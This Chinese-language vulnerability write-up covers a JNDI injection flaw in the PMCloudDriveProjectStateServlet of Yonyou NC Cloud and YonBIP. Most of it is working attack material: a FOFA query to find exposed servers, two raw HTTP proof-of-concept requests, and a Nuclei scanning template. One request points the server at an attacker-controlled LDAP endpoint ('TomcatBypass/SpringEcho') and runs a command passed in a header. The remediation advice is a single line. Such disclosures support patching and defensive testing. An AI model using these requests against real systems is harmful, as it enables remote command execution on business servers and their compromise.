免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
用友NC是“企业资源规划(Enterprise Resource Planning)”的缩写,是指用友软件股份有限公司开发的一套企业管理软。用友NC系统是一种集成管理企业各项业务流程的信息化解决方案。该系统涵盖了财务、人力资源、供应链管理等多个方面,旨在帮助企业提高运营效率、优化资源利用、提升管理水平。
用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet 接口处存在JNDI注入漏洞,恶意攻击者可利用该漏洞在服务器上执行任意命令,尽可能会导致服务器失陷。
影响范围:
NCC2105、NCC2111、YonBIP高级版2207、YonBIP高级版2305
Ⅱ、fofa语句
app="用友-NC-Cloud"
Ⅲ、漏洞复现
POC-1
POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Connection: close{
"data_source":"ldap://your-dns",
"user":""
}
1、构建poc
2、DNS记录
3、利用此漏洞执行命令
POC-2
POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
Host: 127.0.0.1
cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Connection: close{
"data_source":"ldap://IP:1389/TomcatBypass/SpringEcho",
"user":""
}
4、构建POC
Ⅳ、Nuclei-POC
id: yonyou-NC-Cloud-JNDIinfo:name: 用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞author: WLFseverity: highmetadata: fofa-query: app="用友-NC-Cloud"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/jsonConnection: close{"data_source":"ldap://{{interactsh-url}}","user":""}matchers:- type: dsldsl:- contains(interactsh_protocol, "dns")condition: and
Ⅴ、修复建议
升级至安全版本